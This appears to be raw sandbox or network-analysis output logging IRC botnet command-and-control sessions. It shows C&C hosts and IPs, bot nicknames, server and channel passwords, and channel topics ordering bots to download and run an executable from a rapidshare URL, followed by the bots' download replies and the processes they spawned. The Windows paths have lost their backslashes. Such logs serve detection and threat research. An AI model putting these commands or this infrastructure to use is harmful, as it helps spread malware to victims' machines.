Botnet C&C irc
login.ipwhois.co.uk DNS_TYPE_A 92.241.165.230 92.241.164.101 92.241.164.102
login.ipwhois.co.uk :47221
Nick: :{00-AUS-XP-pc7-6970}
Username: blaze
Server Pass: weed
Joined Channel: #crimbot-esp
Channel Topic for Channel #crimbot-esp: “.enable http://rapidshare.com/files/415120355/file.exe 1”
Private Message to User {iNF-00-AUT-XP-pXxa1@: “20.5kb downloaded to C:DOCUME~1ADMINI~1LOCALS~1Temptempfile66347.exe (20.5kbps)”
Process Created
C:WINDOWSwinusbservice.exe
Botnet C&C irc
login.ipwhois.co.uk DNS_TYPE_A 92.241.164.101 92.241.164.102 92.241.165.230
login.ipwhois.co.uk:47221
Nick: AUS|XP|pc2|269032
Username: bubqfli
Joined Channel: #hbot-buy
Joined Channel: #uobg-ohl
Channel Topic for Channel #hbot-buy: “.foobar http://rapidshare.com/files/415120355/file.exe 1”
Private Message to Channel #hbot-buy: “.:[uptdate]:. File download: 20.5KB to: C:DOCUME~1ADMINI~1LOCALS~1Temperaseme_00134.exe @ 20.5KB/sec.”
Process Created
C:Documents and SettingsAdministratorApplication Datajusched.exe
Domain C&C irc
addr: login.ipwhois.org.uk ip: 92.241.165.230
addr: login.ipwhois.org.uk ip: 92.241.164.102login.ipwhois.org.uk:47221
User Name: 2293361022
Real Name: HOME-OFF-D5F0AC
Password: letmein
Nick Name: N|USA|M2|0|XP|474739079
Channel: ##NN-new
Password: nn
Process Created
C:WINDOWSsystem32wmsrvc.exe